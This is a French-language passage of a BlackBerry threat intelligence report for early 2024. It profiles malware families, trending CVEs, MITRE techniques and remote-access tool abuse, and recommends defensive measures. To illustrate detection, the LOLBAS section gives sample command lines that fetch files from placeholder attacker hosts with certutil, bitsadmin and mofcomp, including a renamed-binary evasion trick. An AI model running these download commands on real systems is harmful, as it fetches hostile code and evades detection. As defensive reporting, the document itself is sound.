Bien que Cobalt Strike soit principalement utilisé par les testeurs de pénétration et les équipes rouges pour évaluer le niveau de sécurité des réseaux, il a également été exploité par des acteurs de la menace. Le code de Cobalt Strike 4.0 a fait l'objet d'une fuite en ligne à la fin de l'année 2020, ce qui a permis à un large éventail d'adversaires malveillants de l'utiliser rapidement. La double nature de Cobalt Strike souligne l'importance de la vigilance et de mesures de cybersécurité robustes pour atténuer les risques associés à son utilisation abusive et protéger les réseaux d'une exploitation potentielle.

Ngrok

Ngrok est une plateforme permettant d'exposer les systèmes internes à l'Internet. Elle fournit un accès tunnel à un réseau ou à un appareil derrière les pare-feux. Après avoir établi un point d'accès visible sur l'internet, le trafic à destination de ce point d'accès est envoyé par des tunnels TLS (Transport Layer Security) à l'agent Ngrok correspondant dans le réseau interne. Cela permet des activités telles que les tests ad hoc rapides des systèmes ou l'administration à distance.
Toutefois, cette fonctionnalité en fait également un outil attrayant pour les attaquants, car elle fournit un canal sécurisé pour le commandement et le contrôle (C2) et l'exfiltration. Dans le passé, il a été utilisé par des groupes de menace tels que ALPHV, Lazarus et Daixin Team.

ConnectWise

ConnectWise ScreenConnect est un outil d'administration de bureau à distance largement utilisé par le support technique, les fournisseurs de services gérés (MSP) et d'autres professionnels pour authentifier les machines. 
Les acteurs de la menace peuvent abuser de ScreenConnect pour infiltrer des points d'extrémité de grande valeur et exploiter des privilèges. ConnectWise a récemment résolu deux problèmes de sécurité majeurs (CVE-2024-1709 et CVE-2024-1708) qui pourraient potentiellement permettre à des attaquants anonymes d'exploiter une faille de contournement d'authentification et de créer des comptes d'administrateur sur des instances exposées publiquement.  

Menaces prévalentes par plate-forme : Windows

Remcos

Trojan d'accès à distance

Remcos, abréviation de Remote Control and Surveillance (contrôle et surveillance à distance), est une application utilisée pour accéder à distance à l'appareil d'une victime.

Agent Tesla

Voleur d'informations

L'agent Tesla est un cheval de Troie basé sur .NET qui est souvent vendu en tant que MaaS et qui est principalement utilisé pour la collecte d'informations d'identification.

RedLine

Voleur d'informations

Le logiciel malveillant RedLine utilise un large éventail d'applications et de services pour exfiltrer illicitement les données des victimes, telles que les informations relatives aux cartes de crédit, les mots de passe et les cookies.

RisePro

Voleur d'informations

Alors que des variantes actualisées de RisePro ont été observées dans notre dernier rapport, le voleur d'informations a fait l'objet d'une nouvelle campagne et a été faussement distribué en tant que "logiciel craqué" sur des dépôts GitHub au cours de la période couverte par le présent rapport.

Chargeur de fumée

Porte dérobée

SmokeLoader est un logiciel malveillant modulaire utilisé pour télécharger d'autres charges utiles et voler des informations. Il a été observé pour la première fois en 2011, mais reste une menace active à ce jour.

Prometei

Cryptocurrency Miner/Botnet

Prometei est un botnet de crypto-monnaies multi-étapes et multiplateformes qui cible principalement les pièces de monnaie Monero. Il peut adapter sa charge utile pour cibler les plateformes Linux ou Windows. Prometei a été utilisé avec Mimikatz pour se propager au plus grand nombre de points d'accès possible.

Buhti

Ransomware

Buhti est un ransomware qui utilise des variantes existantes d'autres logiciels malveillants tels que LockBit ou Babuk pour cibler les systèmes Linux et Windows.

Menaces prévalentes par plate-forme : Linux

XMRig

Cryptocurrency Miner

XMRig continue d'être répandu au cours de la période couverte par ce rapport. Le mineur cible Monero tout en permettant à l'acteur de la menace d'utiliser le système d'une victime pour miner de la crypto-monnaie à son insu.

NoaBot/Mirai

Déni de service distribué (DDoS)

NoaBot est une variante légèrement plus sophistiquée de Mirai. Il bénéficie de techniques d'obscurcissement améliorées par rapport à Mirai et utilise SSH pour se propager plutôt que Telnet. Il est également compilé avec uClibc au lieu de GCC, ce qui rend la détection difficile.NoaBot/Mirai

XorDDoS

DDoS

Fréquemment observé dans notre télémétrie, XorDDoS est un cheval de Troie malveillant qui cible les appareils fonctionnant sous Linux et qui coordonne les réseaux de zombies infectés par le biais d'instructions C2. Il tire son nom de l'utilisation du chiffrement XOR pour contrôler l'accès aux données d'exécution et de communication.

AcidPour

Essuie-glace

Bien qu'elle ne soit pas présente dans notre télémétrie, une nouvelle version de l'effaceur de données AcidPour a été observée dans la nature. La dernière version du logiciel malveillant, qui est utilisé pour effacer les fichiers sur les routeurs et les modems, est conçue pour cibler spécifiquement les appareils Linux x86.

Menaces prévalentes par plate-forme : MacOS

RustDoor

Porte dérobée

RustDoor est un logiciel malveillant à porte dérobée basé sur Rust qui est principalement distribué sous la forme de mises à jour de programmes légitimes. Le logiciel malveillant se propage sous forme de binaires FAT contenant des fichiers Mach-o.

Voleur atomique

Voleur d'informations

Le voleur atomique (AMOS) reste répandu avec une nouvelle version repérée dans la nature. La dernière version du voleur intègre un script Python pour passer inaperçu. AMOS cible les mots de passe, les cookies des navigateurs, les données de remplissage automatique, les portefeuilles de cryptomonnaie et les données du trousseau de clés du Mac.

Transfert d'Empire

Voleur d'informations

Un voleur d'informations découvert par Moonlock Lab en février 2024. Il peut s'autodétruire lorsqu'il détecte qu'il s'exécute dans un environnement virtuel. Cela permet au logiciel malveillant de ne pas être détecté et rend l'analyse plus difficile pour les défenseurs. Empire Transfer cible les mots de passe, les cookies de navigateur et les portefeuilles cryptographiques, et utilise des tactiques similaires à celles d'Atomic Stealer (AMOS).

Menaces prévalentes par plateforme : Android

SpyNote

Voleur d'informations/RAT

SpyNote utilise le service d'accessibilité d'Android pour capturer les données de l'utilisateur et les envoyer à un serveur C2.

Anatsa/Teabot

Voleur d'informations

Principalement distribué par l'intermédiaire du Google Play store sous forme d'applications de type cheval de Troie. Après l'infection initiale par l'application de Troie, Anatsa télécharge d'autres fichiers malveillants sur l'appareil de la victime à partir d'un serveur C2.

Vultur

Voleur d'informations/RAT

Découvert pour la première fois en 2021, Vultur a été distribué par le biais d'applications de chevaux de Troie et de techniques d'ingénierie sociale de type "smishing" (hameçonnage par SMS). Outre l'exfiltration de données, un acteur de la menace peut également apporter des modifications au système de fichiers, modifier les autorisations d'exécution et contrôler l'appareil infecté à l'aide des services d'accessibilité Android.

Coper/Octo

Voleur d'informations/RAT

Une variante de la famille Exobot. Présenté sous la forme d'un produit MaaS, ses capacités comprennent l'enregistrement des frappes, la surveillance des SMS, le contrôle de l'écran, l'accès à distance et l'opération C2.

Vulnérabilités et expositions courantes

Les vulnérabilités et expositions communes (CVE) fournissent un cadre pour l'identification, la normalisation et la publication des vulnérabilités et expositions connues en matière de sécurité. Comme indiqué précédemment, les cybercriminels utilisent de plus en plus les CVE pour pénétrer dans les systèmes et voler des données. Au cours de cette période, de nouvelles vulnérabilités découvertes dans les produits Ivanti, ConnectWise, Fortra et Jenkins ont offert aux acteurs malveillants de nouveaux moyens de cibler les victimes. En outre, les derniers mois ont démontré les risques d'attaques de la chaîne d'approvisionnement qui pourraient être présents dans les projets open-source avec la porte dérobée XZ, qui avait été intentionnellement placée dans XZ Utils, un utilitaire de compression de données disponible sur presque toutes les installations de Linux.

Près de 8 900 nouveaux CVE ont été signalés par le National Institute of Standards and Technology (NIST) entre janvier et mars. Le score de base est composé de paramètres soigneusement calculés qui peuvent être utilisés pour calculer un score de gravité de zéro à 10. Le score de base dominant du CVE était "7", ce qui représentait 26 % du total des scores. Il s'agit d'une augmentation de trois pour cent pour ce score CVE par rapport à la dernière période de rapport. Le mois de mars détient le record du plus grand nombre de CVE nouvellement découverts cette année, avec près de 3 350 nouveaux CVE. Le tableau "Trending CVEs" fait référence à des vulnérabilités spécifiques répertoriées dans la base de données nationale des vulnérabilités du NIST.

Figure 12 : Répartition de la gravité des CVE.

CVE en vogue

XZ Utils Backdoor

CVE-2024-3094 (10 critiques)
Accès non autorisé

Ce code malveillant était intégré dans les versions 5.6.0 et 5.6.1 de XZ Utils. La porte dérobée manipulait sshd, ce qui permettait à des attaquants non authentifiés d'accéder sans autorisation aux distributions Linux concernées.
 

Vulnérabilités Zero-Day d'Ivanti

CVE-2024-21887 (9.1 Critique) ; CVE-2023-46805 (8.2 Elevée) ; CVE-2024-21888 (8.8 Elevée) ; CVE-2024-21893 (8.2 Elevée)
Exécution de code arbitraire

En début d'année, des vulnérabilités de contournement d'authentification et d'injection de commande ont été découvertes dans les produits Ivanti Connect Secure (9.x, 22.x) et Ivanti Policy Secure (9.x, 22.x). Si ces deux vulnérabilités étaient utilisées conjointement par un acteur de la menace, cela lui permettrait de créer des requêtes malveillantes et d'exécuter des commandes arbitraires sur le système.

En janvier, Ivanti a également mis en garde contre deux autres vulnérabilités affectant les produits, CVE-2024-21888 (une vulnérabilité d'escalade des privilèges) et CVE-2024-21893 (une vulnérabilité de falsification des requêtes côté serveur). Des acteurs nationaux ont exploité ces vulnérabilités de type "zero-day" pour déployer des souches de logiciels malveillants personnalisées.
 

Contournement de l'écran intelligent de Windows

CVE-2024-21412 (8.1 Haut)
Contournement de la sécurité

Il s'agit d'un contournement de la fonction de sécurité des fichiers de raccourcis Internet qui affecte les fichiers de raccourcis Internet de Microsoft Windows. Il nécessite une interaction de l'utilisateur pour contourner les contrôles de sécurité. Dès la première interaction, elle provoque une série d'exécutions qui conduisent finalement la victime à un script malveillant. Cette vulnérabilité de type "zero-day" a été utilisée par un groupe de menace pour déployer le RAT DarkMe.

Vulnérabilité d'élévation du noyau de Windows

CVE-2024-21338 (7.8 Haut)
Élévation de privilèges

L'exploitation de cette vulnérabilité permet à l'attaquant d'obtenir les privilèges du système. Le Lazarus Group (un groupe de menace nord-coréen) a exploité cette vulnérabilité zero-day trouvée dans le pilote AppLocker de Windows (appid.sys) pour obtenir un accès au niveau du noyau.

Exploitation de GoAnywhere MFT de Fortra

CVE-2024-0204 (9.8 critique)
Contournement de l'authentification

En janvier, Fortra a publié un avis de sécurité faisant état d'un contournement critique affectant un produit GoAnywhere MFT. Cette vulnérabilité a été découverte dans le produit GoAnywhere MFT de Fortra avant la version 7.4.1. L'exploitation permet à un utilisateur non autorisé de créer un utilisateur administrateur via le portail d'administration.

Vulnérabilité de lecture arbitraire de fichiers dans Jenkins

CVE-2024-23897 (9.7 Critique)
Exécution de code à distance

Les versions antérieures de Jenkins - jusqu'à 2.441 et antérieures, LTS 2.426.2 - contiennent une vulnérabilité découverte sur le système de fichiers du contrôleur Jenkins via l'interface de ligne de commande intégrée. Elle se trouve dans la bibliothèque args4j, qui possède une fonctionnalité qui remplace le caractère "@" suivi d'un chemin de fichier dans un argument par le contenu du fichier.34 Cela permet à un attaquant de lire des fichiers arbitraires sur le système de fichiers, et pourrait potentiellement conduire à l'exécution de code à distance.

Vulnérabilité de ConnectWise ScreenConnect 23.9.7

CVE-2024-1709 (10 critiques) ; CVE-2024-1708 (8.4 élevés)
Exécution de code à distance

Cette vulnérabilité affecte le produit ConnectWise ScreenConnect 23.9.7. Des attaquants ont été vus en train d'exploiter ces deux vulnérabilités dans la nature. Ces deux vulnérabilités fonctionnent conjointement : CVE-2024-1709 (une vulnérabilité critique de contournement de l'authentification) permet à l'attaquant de créer des comptes administratifs et d'exploiter CVE-2024-1708 (une vulnérabilité de traversée de chemin), ce qui permet un accès non autorisé aux fichiers et aux répertoires de la victime.

Techniques courantes de MITRE

Comprendre les techniques de haut niveau des groupes de menace peut aider à décider des techniques de détection à privilégier. BlackBerry a observé les 20 principales techniques suivantes utilisées par les acteurs de la menace au cours de la période couverte par le rapport.

Une flèche vers le haut dans la dernière colonne indique que l'utilisation de la technique a augmenté depuis notre dernier rapport ; une flèche vers le bas indique que l'utilisation a diminué, et un symbole égal (=) signifie que la technique reste dans la même position que dans notre dernier rapport.

Nom de la technique ID de la technique Nom de la tactique Dernier rapport Changer
Processus d'injection
T1055
L'escalade des privilèges, l'évasion des défenses
1
=
Découverte d'informations sur le système
T1082
Découverte
3
Chargement latéral de DLL
T1574.002
Persistance, escalade des privilèges, évasion des défenses
4
Capture d'entrée
T1056
Accès aux données d'identification, Collecte
2
Découverte de logiciels de sécurité
T1518.001
Découverte
NA
Mascarade
T1036
Défense Evasion
10
Découverte de fichiers et de répertoires
T1083
Découverte
13
Découverte du processus
T1057
Découverte
19
Protocole de la couche application
T1071
Commande et contrôle
6
Clés d'exécution du registre/dossier de démarrage
T1547.001
Persistance, escalade des privilèges
9
Protocole de la couche non applicative
T1095
Commande et contrôle
5
Découverte du système à distance
T1018
Découverte
15
Découverte de la fenêtre d'application
T1010
Découverte
NA
Emballage du logiciel
T1027.002
Défense Evasion
NA
Tâche/travail programmé(e)
T1053
Exécution, persistance, escalade des privilèges
8
Service Windows
T1543.003
Persistance, escalade des privilèges
12
Désactiver ou modifier des outils
T1562.001
Défense Evasion
18
Interprète de commandes et de scripts
T1059
Exécution
7
Fichiers ou informations obscurcis
T1027
Défense Evasion
NA
Réplication sur support amovible
T1091
Accès initial, mouvement latéral
11
ID de la technique
Processus d'injection
T1055
Découverte d'informations sur le système
T1082
Chargement latéral de DLL
T1574.002
Capture d'entrée
T1056
Découverte de logiciels de sécurité
T1518.001
Mascarade
T1036
Découverte de fichiers et de répertoires
T1083
Découverte du processus
T1057
Protocole de la couche application
T1071
Clés d'exécution du registre/dossier de démarrage
T1547.001
Protocole de la couche non applicative
T1095
Découverte du système à distance
T1018
Découverte de la fenêtre d'application
T1010
Emballage du logiciel
T1027.002
Tâche/travail programmé(e)
T1053
Service Windows
T1543.003
Désactiver ou modifier des outils
T1562.001
Interprète de commandes et de scripts
T1059
Fichiers ou informations obscurcis
T1027
Réplication sur support amovible
T1091
Nom de la tactique
Processus d'injection
L'escalade des privilèges, l'évasion des défenses
Découverte d'informations sur le système
Découverte
Chargement latéral de DLL
Persistance, escalade des privilèges, évasion des défenses
Capture d'entrée
Accès aux données d'identification, Collecte
Découverte de logiciels de sécurité
Découverte
Mascarade
Défense Evasion
Découverte de fichiers et de répertoires
Découverte
Découverte du processus
Découverte
Protocole de la couche application
Commande et contrôle
Clés d'exécution du registre/dossier de démarrage
Persistance, escalade des privilèges
Protocole de la couche non applicative
Commande et contrôle
Découverte du système à distance
Découverte
Découverte de la fenêtre d'application
Découverte
Emballage du logiciel
Défense Evasion
Tâche/travail programmé(e)
Exécution, persistance, escalade des privilèges
Service Windows
Persistance, escalade des privilèges
Désactiver ou modifier des outils
Défense Evasion
Interprète de commandes et de scripts
Exécution
Fichiers ou informations obscurcis
Défense Evasion
Réplication sur support amovible
Accès initial, mouvement latéral
Dernier rapport
Processus d'injection
1
Découverte d'informations sur le système
3
Chargement latéral de DLL
4
Capture d'entrée
2
Découverte de logiciels de sécurité
NA
Mascarade
10
Découverte de fichiers et de répertoires
13
Découverte du processus
19
Protocole de la couche application
6
Clés d'exécution du registre/dossier de démarrage
9
Protocole de la couche non applicative
5
Découverte du système à distance
15
Découverte de la fenêtre d'application
NA
Emballage du logiciel
NA
Tâche/travail programmé(e)
8
Service Windows
12
Désactiver ou modifier des outils
18
Interprète de commandes et de scripts
7
Fichiers ou informations obscurcis
NA
Réplication sur support amovible
11
Changer
Processus d'injection
=
Découverte d'informations sur le système
Chargement latéral de DLL
Capture d'entrée
Découverte de logiciels de sécurité
Mascarade
Découverte de fichiers et de répertoires
Découverte du processus
Protocole de la couche application
Clés d'exécution du registre/dossier de démarrage
Protocole de la couche non applicative
Découverte du système à distance
Découverte de la fenêtre d'application
Emballage du logiciel
Tâche/travail programmé(e)
Service Windows
Désactiver ou modifier des outils
Interprète de commandes et de scripts
Fichiers ou informations obscurcis
Réplication sur support amovible

À l'aide de MITRE D3FEND™, l'équipe de recherche et de renseignement sur les menaces BlackBerry a élaboré une liste complète de contre-mesures pour les techniques observées au cours de cette période de déclaration, qui est disponible dans notre GitHub public.

Les trois premières techniques sont des procédures bien connues utilisées par les adversaires pour recueillir des informations clés afin de mener des attaques réussies. La section Applied Countermeasures contient des exemples de leur utilisation et des informations utiles à surveiller.

L'impact de l'ensemble des techniques et tactiques est illustré dans le graphique ci-dessous :

Figure 13 : Techniques ATT&CK® de MITRE observées.

La tactique la plus répandue au cours de cette période est l'évasion de la défense, qui représente 24 % du total des tactiques observées au cours de cette période, suivie par la découverte ( 23 % ) et l'escalade des privilèges ( 21 %).
Figure 14 : Tactiques observées de MITRE ATT&CK.

Contre-mesures appliquées aux techniques notoires de MITRE

L'équipe de recherche et de renseignement de BlackBerry a analysé cinq techniques MITRE observées au cours de la période couverte par le présent rapport :

CylanceMDR Données

Cette section du rapport met en évidence plusieurs des détections de menaces les plus courantes observées dans les environnements des clients de CylanceMDR .

CylanceMDRanciennement connu sous le nom de CylanceGUARD®, est un service de détection et de réponse gérées (MDR) par abonnement, proposé par BlackBerry , qui assure une surveillance 24 heures sur 24 et 7 jours sur 7 et aide les organisations à stopper les cybermenaces sophistiquées qui exploitent les lacunes des programmes de sécurité du client. L'équipe de CylanceMDR a suivi des milliers d'alertes au cours de cette période. Ci-dessous, nous décomposons la télémétrie par région afin de fournir un aperçu supplémentaire du paysage actuel des menaces.

Figure 15 : Les cinq principales alertes par région.

CylanceMDR Observations

Au cours de la période couverte par ce rapport, l'équipe CylanceMDR a observé que Certutil était à l'origine d'un grand nombre de détections au sein du centre opérationnel de sécurité (SOC), à savoir la technique liée aux outils de renommage tels que Certutil (par exemple : "Possible Certutil Renamed Execution"). Il y a eu un pic de détections à ce sujet dans toutes les régions géographiques où BlackBerry protège ses clients.

Dans notre précédent rapport, nous avons expliqué comment les acteurs de la menace abusent ou détournent les utilitaires LOLBAS (living-off-the-land binaries and scripts) tels que Certutil : ils renomment souvent des utilitaires légitimes (tels que Certutil) pour tenter d'échapper aux capacités de détection. Ce phénomène est connu sous le nom de masquerading et porte l'identifiant technique MITRE : T1036.003. Les défenseurs doivent déployer des capacités de détection robustes pour minimiser le risque de techniques d'évasion telles que le masquerading. Par exemple, la création d'une règle de détection qui ne se déclenche que lorsqu'elle voit la commande Certutil (ainsi que les options/arguments utilisés abusivement avec cet outil) peut facilement être contournée.

Prenons par exemple les deux commandes ci-dessous :
certutil.exe -urlcache -split -f "hxxps://bbtest/badFile[.]txt" bad[.]txt

Si vos capacités de détection reposent uniquement sur l'affichage de la commande
certutil (ainsi que de ses options), cette commande sera détectée, mais considérée comme une protection faible, car elle pourrait facilement être contournée.
outlook.exe -urlcache -split -f "hxxps://bbtest/badFile[.]txt" bad[.]txt

Dans ce cas, nous avons renommé certutil.exe en outlook.exe, ce qui permettrait d'échapper complètement à la détection (si l'on utilise la logique décrite ci-dessus).

Une meilleure solution consisterait à s'assurer que les métadonnées du fichier/processus exécutable portable (PE), telles que le nom de fichier original (le nom de fichier interne fourni au moment de la compilation), sont collectées et intégrées dans les capacités de détection. Un décalage entre le nom du fichier sur le disque et les métadonnées PE du binaire est un bon indicateur qu'un binaire a été renommé après la compilation.

Activité LOLBAS

Au cours de cette période, nous avons constaté un changement dans l'activité LOLBAS observée dans les environnements de nos clients :

  • Augmentation des détections liées à regsvr32.exe.
  • Diminution de l'activité liée à mshta.exe.
  • Une forte augmentation des détections liées à bitsadmin.exe.
Figure 16 : LOLBAS détecté par CylanceMDR.


Vous trouverez ci-dessous un exemple d'utilisation malveillante de LOLBAS (à l'exclusion de ceux qui ont été partagés au cours de la dernière période de référence).

Fichier : Bitsadmin.exe
Mitre : T1197 | T1105
Comment il peut être abusé : 

  • Téléchargement/upload à partir de ou vers un hôte malveillant (transfert d'outils Ingress)
  • Peut être utilisé pour exécuter un processus malveillant

Example Command:
bitsadmin /transfer defaultjob1 /download hxxp://baddomain[.]com/bbtest/bbtest C:\Users\<user>\AppData\Local\Temp\bbtest


Fichier : mofcomp.exe
Mitre : T1218
Comment il peut être abusé : 

  • Peut être utilisé pour installer des scripts MOF (managed object format) malveillants.
  • Les déclarations MOF sont analysées par l'utilitaire mofcomp.exe et ajoutent les classes et les instances de classes définies dans le fichier au référentiel WMI.

Example Command:
mofcomp.exe \\<AttackkerIP>\content\BBwmi[.]mof

Les outils de surveillance et de gestion à distance (RMM) sont fréquemment utilisés par les fournisseurs de services informatiques gérés (MSP) pour surveiller à distance les terminaux de leurs clients. Malheureusement, ces outils permettent également aux acteurs de la menace d'accéder à ces mêmes systèmes. Ces outils offrent une multitude de fonctions d'administration et permettent aux acteurs de la menace de se fondre dans la masse en utilisant des outils fiables et approuvés.

En 2023, l'utilisation abusive des outils RMM a fait l'objet d'une attention particulière en raison de rapports liés à Scattered Spider, un groupe de cyber-attaques soupçonné d'être à l'origine des attaques de MGM Resorts International en septembre 2023. Les membres de Scattered Spider sont considérés comme des experts en ingénierie sociale sophistiquée et déploient diverses techniques telles que les attaques par échange de cartes SIM, le phishing et le push bombing. Ils ont utilisé une série d'outils RMM au cours de leurs attaques, tels que :

  • Splashtop
  • TeamViewer
  • ScreenConnect

Au cours de la première période de déclaration en 2024, l'attention portée aux outils RMM est restée élevée depuis la découverte de deux vulnérabilités dans ConnectWise ScreenConnect (toutes les versions inférieures à la 23.9.8). Les détails des CVE peuvent être consultés ci-dessous :

CVE-2024-1709

CWE-288 : Contournement de l'authentification par un autre chemin ou canal.

CVE-2024-1708

CWE-22 : limitation inappropriée d'un nom de chemin vers un répertoire restreint ("path traversal").

Le graphique ci-dessous illustre les outils RMM les plus courants observés au cours de la période couverte par le présent rapport.

Figure 17 : Outils RMM rencontrés par CylanceMDR.


Au cours de notre analyse, nous avons constaté que de nombreux clients utilisent plusieurs outils RMM, ce qui augmente la surface d'attaque et le risque de l'organisation. Les mesures d'atténuation suggérées sont les suivantes

Audit des outils d'accès à distance (outils RMM)

  • Identifier les outils RMM actuellement utilisés dans l'environnement.
  • Confirmer qu'ils sont approuvés dans l'environnement.
  • Si vous utilisez plusieurs outils RMM, déterminez s'il est possible de les consolider. En réduisant le nombre d'outils différents utilisés, on réduit le risque.

Désactiver des ports et des protocoles

  • Bloquer les communications réseau entrantes et sortantes vers les ports couramment utilisés et associés à des outils d'accès à distance non approuvés.

Vérifier régulièrement les journaux

  • Détecter l'utilisation anormale des outils d'accès à distance.

Patching

  • Assurer un examen régulier des vulnérabilités associées aux outils RMM utilisés, en les mettant à jour si nécessaire.
  • Les logiciels accessibles par l'internet, tels que les outils RMM, devraient toujours être une priorité absolue lors des cycles de correctifs réguliers. 

Segmentation du réseau

  • Minimiser les mouvements latéraux en segmentant le réseau et en limitant l'accès aux appareils et aux données.

Marquage des appareils

  • Vérifiez si votre fournisseur de sécurité propose des options pour marquer les dispositifs qui utilisent des outils RMM. Si c'est le cas, activez cette option pour garantir la visibilité du SOC. Certains fournisseurs proposent des options permettant de laisser une note/étiquette identifiant les outils/activités approuvés, ce qui aide grandement les analystes lors des enquêtes.

Chargement de mémoire RMM

  • Utilisez un logiciel de sécurité capable de détecter les accès à distance qui ne sont chargés que dans la mémoire.

Conclusion

Ce rapport de 90 jours est conçu pour vous aider à rester informé et préparé aux menaces futures. Face à l'évolution rapide du paysage des menaces de cybersécurité, il est utile de se tenir au courant des dernières actualités en matière de sécurité pour votre secteur d'activité, votre région géographique et les questions clés. Voici nos principales conclusions pour la période de janvier à mars 2024 :

  • Globalement, BlackBerry a arrêté 37 000 attaques par jour dirigées contre nos locataires, selon notre télémétrie interne Attacks Stopped. Nous avons constaté une forte augmentation des logiciels malveillants uniques ciblant nos locataires et nos clients, en hausse de 40 % par minute par rapport à la période précédente. Cela pourrait suggérer que les acteurs de la menace prennent des mesures importantes pour cibler soigneusement leurs victimes.
  • Les voleurs d'informations occupent une place prépondérante dans les sections "Infrastructures critiques", "Entreprises commerciales" et "Principales menaces". Cela suggère que les données sensibles et privées sont très recherchées par les acteurs de la menace dans toutes les régions géographiques et tous les secteurs d'activité.
  • Comme le souligne notre nouvelle section sur les ransomwares, qui décrit les groupes de ransomwares les plus importants, les ransomwaresciblent de plus en plus les infrastructures critiques, en particulier les soins de santé.
  • L'exploitation des CVE s'est rapidement développée au cours de l'année écoulée et continuera à le faire. BlackBerry a enregistré près de 9 000 nouveaux CVE divulgués par le NIST au cours des trois derniers mois. En outre, plus de 56 % de ces vulnérabilités divulguées ont obtenu un score de criticité supérieur à 7,0. Les exploits liés à des logiciels légitimes très utilisés tels que ConnectWise ScreenConnect, GoAnywhere et de nombreux produits Ivanti authentiques ont été exploités par des acteurs de la menace à un rythme alarmant pour diffuser toute une série de logiciels malveillants sur les machines des victimes non corrigées.
  • Les tromperies politiques par le biais de "deepfakes" et de fausses informations se répandent de plus en plus sur les médias sociaux et continueront à poser problème à l'avenir, notamment en raison de l'invasion de l'Ukraine par la Russie, du conflit en cours au Moyen-Orient et des prochaines élections présidentielles américaines qui auront lieu au mois de novembre.

De plus amples informations sur les principales menaces et défenses en matière de cybersécurité sont disponibles sur le blogBlackBerry .

Remerciements

Annexe : Menaces pesant sur les infrastructures critiques et les entreprises commerciales

8Base ransomware : Un groupe de ransomware particulièrement agressif apparu pour la première fois en 2023. Il a été extrêmement actif au cours de sa courte histoire, ciblant souvent des victimes en Amérique du Nord et dans les pays du LATAM. Le groupe de menace utilise un ensemble de tactiques pour obtenir un accès initial, puis peut également exploiter les vulnérabilités des systèmes de la victime pour maximiser le paiement potentiel.

Amadey (Amadey Bot) : Réseau de zombies multifonctionnel de conception modulaire. Une fois installé sur l'appareil d'une victime, Amadey peut recevoir des commandes de ses serveurs C2 pour exécuter diverses tâches, notamment le vol d'informations et le déploiement de charges utiles supplémentaires.

Buhti : Ransomware relativement récent, Buhti utilise des variantes des familles de ransomware LockBit 3.0 (alias LockBit Black) et Babuk pour attaquer les systèmes Windows et Linux. En outre, Buhti est connu pour utiliser un utilitaire d'exfiltration de données personnalisé écrit dans le langage de programmation "Go", conçu pour voler des fichiers avec des extensions spécifiques. Les opérateurs de ransomware ont également déjà été vus en train d'exploiter rapidement d'autres bogues graves affectant l'application d'échange de fichiers Aspera Faspex d'IBM (CVE-2022-47986) et la vulnérabilité PaperCut récemment corrigée (CVE-2023-27350).

LummaStealer (LummaC2) : Un infostealer en C qui cible les entreprises commerciales et les organisations d'infrastructures critiques, en se concentrant sur l'exfiltration de données privées et sensibles de l'appareil de la victime. Souvent promu et distribué via des forums clandestins et des groupes Telegram, cet infostealer s'appuie souvent sur des chevaux de Troie et du spam pour se propager.

PrivateLoader : Une famille de téléchargeurs tristement célèbre qui sévit depuis 2021 et qui cible principalement les entreprises commerciales d'Amérique du Nord. PrivateLoader (comme son nom l'indique) est un mécanisme d'accès initial qui facilite le déploiement d'une pléthore de charges utiles malveillantes sur les appareils des victimes, à savoir les voleurs d'informations. PrivateLoader exploite un réseau de distribution par le biais d'un service souterrain de paiement à l'installation (PPI) afin de financer son utilisation et son développement continus.

RaccoonStealer : MaaS infostealer. Dans la nature depuis 2019, les créateurs de RaccoonStealer ont amélioré ses capacités à éviter les logiciels de sécurité et les logiciels antivirus traditionnels. Selon la télémétrie interne de BlackBerry, RaccoonStealer a été observé en train de cibler des entreprises commerciales en Amérique du Nord.

RedLine (RedLine Stealer) : : un logiciel malveillant de vol d'informations largement distribué et souvent vendu par l'intermédiaire de MaaS. La principale motivation du groupe de menace qui distribue le logiciel malveillant semble être le gain financier plutôt que la politique, la destruction ou l'espionnage. C'est pourquoi RedLine a activement ciblé toute une série d'industries et de régions géographiques.

Remcos (RemcosRAT) : Un RAT de qualité commerciale utilisé pour contrôler à distance un ordinateur ou un appareil. Bien que présenté comme un logiciel légitime, ce logiciel de contrôle et de surveillance à distance était souvent utilisé comme un cheval de Troie d'accès à distance.

SmokeLoader : Un logiciel malveillant couramment utilisé et doté d'une pléthore de capacités, notamment le déploiement d'autres logiciels malveillants sur l'appareil d'une victime. SmokeLoader est une menace récurrente observée par BlackBerry dans le cadre de plusieurs rapports mondiaux de renseignement sur les menaces. Au cours de la période couverte par ce rapport, le logiciel malveillant a ciblé des services commerciaux et professionnels en Amérique du Nord.

Vidar (VidarStealer) : Un voleur d'informations sur les produits de base qui est dans la nature depuis 2018 et qui s'est développé en une famille de logiciels malveillants lourdement armés. Les attaquants ont pu déployer Vidar en exploitant des vulnérabilités dans le populaire logiciel ScreenConnect RRM de ConnectWise. Ces deux CVE, CVE-2024-1708 et CVE-2024-1709, ont permis aux acteurs de la menace de contourner et d'accéder à des systèmes critiques.

Avis de non-responsabilité

Les informations contenues dans le rapport BlackBerry Global Threat Intelligence Report sont fournies à titre d'information uniquement. BlackBerry ne garantit pas l'exactitude, l'exhaustivité et la fiabilité des déclarations ou des recherches de tiers auxquelles il est fait référence dans le présent rapport et n'en assume pas la responsabilité. L'analyse exprimée dans ce rapport reflète la compréhension actuelle des informations disponibles par nos analystes de recherche et peut être sujette à des changements au fur et à mesure que des informations supplémentaires sont portées à notre connaissance. Il incombe aux lecteurs de faire preuve de diligence raisonnable lorsqu'ils appliquent ces informations à leur vie privée et professionnelle. BlackBerry ne tolère aucune utilisation malveillante ou abusive des informations présentées dans ce rapport.